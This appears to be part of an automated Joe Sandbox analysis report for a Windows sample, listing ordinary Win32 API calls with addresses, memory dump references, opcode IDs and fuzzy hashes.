                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CreateWindow
                                                                          • String ID:
                                                                          • API String ID: 716092398-0
                                                                          • Opcode ID: 99ee45e58afab452ebd8d8099a4319ca8bb03e99333467587a6c742e65940f0d
                                                                          • Instruction ID: 13f77f5b12b5d4dba0df04b824f9bbdcdbf9abdef4ba7f4078844aaa66f06397
                                                                          • Opcode Fuzzy Hash: 99ee45e58afab452ebd8d8099a4319ca8bb03e99333467587a6c742e65940f0d
                                                                          • Instruction Fuzzy Hash: C3F013B2200510AFDB84CF9CD9C0F9373ECEB0C210B0881A6FA08CF24AD225EC108BB1
                                                                          APIs
                                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004149FF
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CallbackDispatcherUser
                                                                          • String ID:
                                                                          • API String ID: 2492992576-0
                                                                          • Opcode ID: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                          • Instruction ID: 59ac3629b8f45f7a6bca1b57e2bf54285868c68ba6336e642f1ef9b7bb8d2b05
                                                                          • Opcode Fuzzy Hash: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                          • Instruction Fuzzy Hash: B2F0DA762042019FC740DF6CC8C488A77E5FF89255B5546A9F989CB356C731EC54CB91
                                                                          APIs
                                                                          • GetFileAttributesA.KERNEL32(00000000,00000000,0042CCE0,?,00000001,?,?,00000000,?,0042CD32,00000000,00452085,00000000,004520A6,?,00000000), ref: 0042CCC3
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AttributesFile
                                                                          • String ID:
                                                                          • API String ID: 3188754299-0
                                                                          • Opcode ID: 61041821089c7d4aa2000ec0e86c70dfe7be4184ca8188e9cf26529104da5cfb
                                                                          • Instruction ID: 1943a86784c022a2dfd859aef87f3de3c0de5fcd5c78e915f44ffa8231ae9d07
                                                                          • Opcode Fuzzy Hash: 61041821089c7d4aa2000ec0e86c70dfe7be4184ca8188e9cf26529104da5cfb
                                                                          • Instruction Fuzzy Hash: B0E06571304704BFD711EB629C93A5EBBACD745714B914476F500D7541D578AE009558
                                                                          APIs
                                                                          • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 0044FE64
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: b8d30b55bd9c337fb850a3ffead974af8be894f982605e1024d96d7d98714d33
                                                                          • Instruction ID: e92c98a8af308b3432749b2dbea91310ced2c99b4e9e22dcf80a84a4ab028b75
                                                                          • Opcode Fuzzy Hash: b8d30b55bd9c337fb850a3ffead974af8be894f982605e1024d96d7d98714d33
                                                                          • Instruction Fuzzy Hash: C9E092A13501083ED340EEAC7C42FA33BCC931A718F008037F988C7242C8619D148BA9
                                                                          APIs
                                                                          • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,004528D3,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E75B
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: FormatMessage
                                                                          • String ID:
                                                                          • API String ID: 1306739567-0
                                                                          • Opcode ID: f2e57c13329fa82bb562111542c19212575287ec657190e48755ffcde1de8f0a
                                                                          • Instruction ID: 307a162b73ad64172b1e6f06154ade3ab8019b251ee6aa90c4987cddc8a641e5
                                                                          • Opcode Fuzzy Hash: f2e57c13329fa82bb562111542c19212575287ec657190e48755ffcde1de8f0a
                                                                          • Instruction Fuzzy Hash: 80E0206178431165F23529156C83F7B120E83C0B08F9480267B50DD3D3DAAE9D09425E
                                                                          APIs
                                                                          • CreateWindowExA.USER32(00000000,0042368C,00000000,94CA0000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00406329
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CreateWindow
                                                                          • String ID:
                                                                          • API String ID: 716092398-0
                                                                          • Opcode ID: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                          • Instruction ID: 1d12608fc0467a25e6c73015cc4d191371d7057fe5102c86e19c90aa3d4ae925
                                                                          • Opcode Fuzzy Hash: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                          • Instruction Fuzzy Hash: 4CE002B2204309BFDB00DE8ADDC1DABB7ACFB4C654F844105BB1C972428275AD608BB1
                                                                          APIs
                                                                          • RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DD38
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Create
                                                                          • String ID:
                                                                          • API String ID: 2289755597-0
                                                                          • Opcode ID: 5e59f431e7dc3fbfe634ec8590c1537f060de66ed7aab2066b747fc67b6210b1
                                                                          • Instruction ID: f0f4a7cc191af20e9b9700f54d410718858f5ac06abb37c2f1ccc41e28cff8f4
                                                                          • Opcode Fuzzy Hash: 5e59f431e7dc3fbfe634ec8590c1537f060de66ed7aab2066b747fc67b6210b1
                                                                          • Instruction Fuzzy Hash: 05E07EB2610129AF9B40DE8CDC81EEB37ADEB1D350F408016FA08D7200C274EC519BB4
                                                                          APIs
                                                                          • FindClose.KERNEL32(00000000,000000FF,0046F950,00000000,0047073F,?,00000000,00470788,?,00000000,004708C1,?,00000000,?,00000000), ref: 0045412A
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CloseFind
                                                                          • String ID:
                                                                          • API String ID: 1863332320-0
                                                                          • Opcode ID: e19e0392ffb8f942ef07e4f90012c062304df668bc5034957742c687a3574691
                                                                          • Instruction ID: 5eabd71f03f270c9e36328c123aabe4f760eecb17ac4c97f42f59bce307939db
                                                                          • Opcode Fuzzy Hash: e19e0392ffb8f942ef07e4f90012c062304df668bc5034957742c687a3574691
                                                                          • Instruction Fuzzy Hash: CEE065B0A04A004BCB14DF3A898425676D25FD5324F04C56AAC58CF3D6E63C84859A26
                                                                          APIs
                                                                          • KiUserCallbackDispatcher.NTDLL(00493E46,?,00493E68,?,?,00000000,00493E46,?,?), ref: 004146AB
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CallbackDispatcherUser
                                                                          • String ID:
                                                                          • API String ID: 2492992576-0
                                                                          • Opcode ID: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                          • Instruction ID: 3a83c41fa5c3d176b15f2666d2672a78f9af76d4247255e2ff0bda4df6ea0631
                                                                          • Opcode Fuzzy Hash: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                          • Instruction Fuzzy Hash: 59E012723001199F8250CE5EDC88C57FBEDEBC966130983A6F508C7306DA31EC44C7A0
                                                                          APIs
                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406F2C
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite
                                                                          • String ID:
                                                                          • API String ID: 3934441357-0
                                                                          • Opcode ID: 6989787615dda6fb0474b9a852aed77f7455facdbde297e08749939c69554e6e
                                                                          • Instruction ID: 1f586823f232578dbf745533d190da316c23ef772c10fc749b20f2ce5ea51255
                                                                          • Opcode Fuzzy Hash: 6989787615dda6fb0474b9a852aed77f7455facdbde297e08749939c69554e6e
                                                                          • Instruction Fuzzy Hash: E0D05B723091117AD620955F6C44DA76BDCCBC5770F11063EB558D72C1D7309C01C675
                                                                          APIs
                                                                            • Part of subcall function 00423608: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 0042361D
                                                                          • ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
                                                                            • Part of subcall function 00423638: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 00423654
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: InfoParametersSystem$ShowWindow
                                                                          • String ID:
                                                                          • API String ID: 3202724764-0
                                                                          • Opcode ID: 1489a060ee1bcc8cc48c15b27d983b014cc6d9756e6ca662c79b076239964338
                                                                          • Instruction ID: 40ba6511a88705317f68f90b714cf273492cbff5df7e869aa0dea3a735aecdb5
                                                                          • Opcode Fuzzy Hash: 1489a060ee1bcc8cc48c15b27d983b014cc6d9756e6ca662c79b076239964338
                                                                          • Instruction Fuzzy Hash: 89D05E123831B03106307BB72805ACB86AC8D966AB389047BB5409B302E91E8A0A61AC
                                                                          APIs
                                                                          • SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: TextWindow
                                                                          • String ID:
                                                                          • API String ID: 530164218-0
                                                                          • Opcode ID: ec54067a7769377eb2baeee9a4c2879ed8266950ae1d3b96fccc382486b1e86e
                                                                          • Instruction ID: 772c2b490b6417829154bcce5d0a54014a2db275ddfc333997dbbca6f26d49c5
                                                                          • Opcode Fuzzy Hash: ec54067a7769377eb2baeee9a4c2879ed8266950ae1d3b96fccc382486b1e86e
                                                                          • Instruction Fuzzy Hash: 7ED05EE27011702BCB01BAED54C4AC667CC9B8825AB1940BBF904EF257C678CE4083A8
                                                                          APIs
                                                                          • KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00466F40,00000000,00000000,00000000,0000000C,00000000), ref: 0046626C
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CallbackDispatcherUser
                                                                          • String ID:
                                                                          • API String ID: 2492992576-0
                                                                          • Opcode ID: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                          • Instruction ID: a3a9c25b9c80179eca176ae0059a0aa24e3542550d9dc9bac8dced773014ab2a
                                                                          • Opcode Fuzzy Hash: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                          • Instruction Fuzzy Hash: 0ED09272210A109F8364CAADC9C4C97B3ECEF4C2213004659E54AC3B15D664FC018BA0
                                                                          APIs
                                                                          • GetFileAttributesA.KERNEL32(00000000,00000000,00450C2B,00000000), ref: 0042CCFB
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AttributesFile
                                                                          • String ID:
                                                                          • API String ID: 3188754299-0
                                                                          • Opcode ID: 01dbdc36424fec664e934353753d4045270514496262de1bfab72665a96f96e3
                                                                          • Instruction ID: cee2652a42bb6fa335edebfce0b7cce520d77b1cbd3538a4821e8cc024acaa82
                                                                          • Opcode Fuzzy Hash: 01dbdc36424fec664e934353753d4045270514496262de1bfab72665a96f96e3
                                                                          • Instruction Fuzzy Hash: 66C08CE03222001A9A1065BD3CC911F06C8892833A3A41F37B438E32D2E23E88266028
                                                                          APIs
                                                                          • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040A8D4,0040CE80,?,00000000,?), ref: 00406EE5
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: 7f8aa10a2b0ebcd99225cbdae7d816ffd0c8159e943a954a1b877cbd8b688861
                                                                          • Instruction ID: fbce42704b7dd2fd8be74a622cf743b4adaa06f64be9adac3ea2875d17ee2119
                                                                          • Opcode Fuzzy Hash: 7f8aa10a2b0ebcd99225cbdae7d816ffd0c8159e943a954a1b877cbd8b688861
                                                                          • Instruction Fuzzy Hash: EAC048A13C130032F92035A60C87F16008C5754F0AE60C43AB740BF1C2D8E9A818022C
                                                                          APIs
                                                                          • SetCurrentDirectoryA.KERNEL32(00000000,?,0049627E,00000000,00496451,?,?,00000005,00000000,00496485,?,?,00000000), ref: 004072BB
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentDirectory
                                                                          • String ID:
                                                                          • API String ID: 1611563598-0
                                                                          • Opcode ID: b7f7ac57d488892482cd1d27060886e150623f3d0701accf4d1aa85b87094221
                                                                          • Instruction ID: c18bf430a4858a09d5fd0626d157798880aaaa8ea81a5298b6cf69089c3012d4
                                                                          • Opcode Fuzzy Hash: b7f7ac57d488892482cd1d27060886e150623f3d0701accf4d1aa85b87094221
                                                                          • Instruction Fuzzy Hash: B0B012E03D161B27CA0079FE4CC191A01CC46292163501B3A3006E71C3D83CC8080514
                                                                          APIs
                                                                          • SetEndOfFile.KERNEL32(?,?,0045BA62,00000000,0045BBED,?,00000000,00000002,00000002), ref: 0044FF93
                                                                            • Part of subcall function 0044FD14: GetLastError.KERNEL32(0044FB30,0044FDD6,?,00000000,?,004962F0,00000001,00000000,00000002,00000000,00496451,?,?,00000005,00000000,00496485), ref: 0044FD17
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLast
                                                                          • String ID:
                                                                          • API String ID: 734332943-0
                                                                          • Opcode ID: 40f744221a1c0ad34bc3dfd7c8217ba7111344780b163017895d6acbe08c1ff7
                                                                          • Instruction ID: f3a0f6ff35c414572697f21b60dc386cc542920b113ac52c9a1142ed5c58418d
                                                                          • Opcode Fuzzy Hash: 40f744221a1c0ad34bc3dfd7c8217ba7111344780b163017895d6acbe08c1ff7
                                                                          • Instruction Fuzzy Hash: 54C04CA1B0010147DF00AAAED5C1A0763D85E4E2093144076B504CF206D6A9D8084A24
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(?,0042E335), ref: 0042E328
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode
                                                                          • String ID:
                                                                          • API String ID: 2340568224-0
                                                                          • Opcode ID: 15eed7d30ca8f87603f8d2fb4c6016cac4064a0446a0c9a22a0947d8b3773134
                                                                          • Instruction ID: 885b9387dc4d85ef1a6bcc41b3ac28186c42b97ac018e1411ad6f8b1d6607996
                                                                          • Opcode Fuzzy Hash: 15eed7d30ca8f87603f8d2fb4c6016cac4064a0446a0c9a22a0947d8b3773134
                                                                          • Instruction Fuzzy Hash: CFB09B7770C6006DB705DA95B45192D63E4D7C47203E14577F400D3580D93C58014918
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e610db4be5d09209adc61dd78440b7b0e9dd7066f593708e54d36c975471eb1e
                                                                          • Instruction ID: 444a78761fbc6a727879d8c4239369b0bde5fc0390465f01f64749401816922a
                                                                          • Opcode Fuzzy Hash: e610db4be5d09209adc61dd78440b7b0e9dd7066f593708e54d36c975471eb1e
                                                                          • Instruction Fuzzy Hash: CDA002756015049ADE04A7A5C849F662298BB44204FC915F971449B092C53C99008E58
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
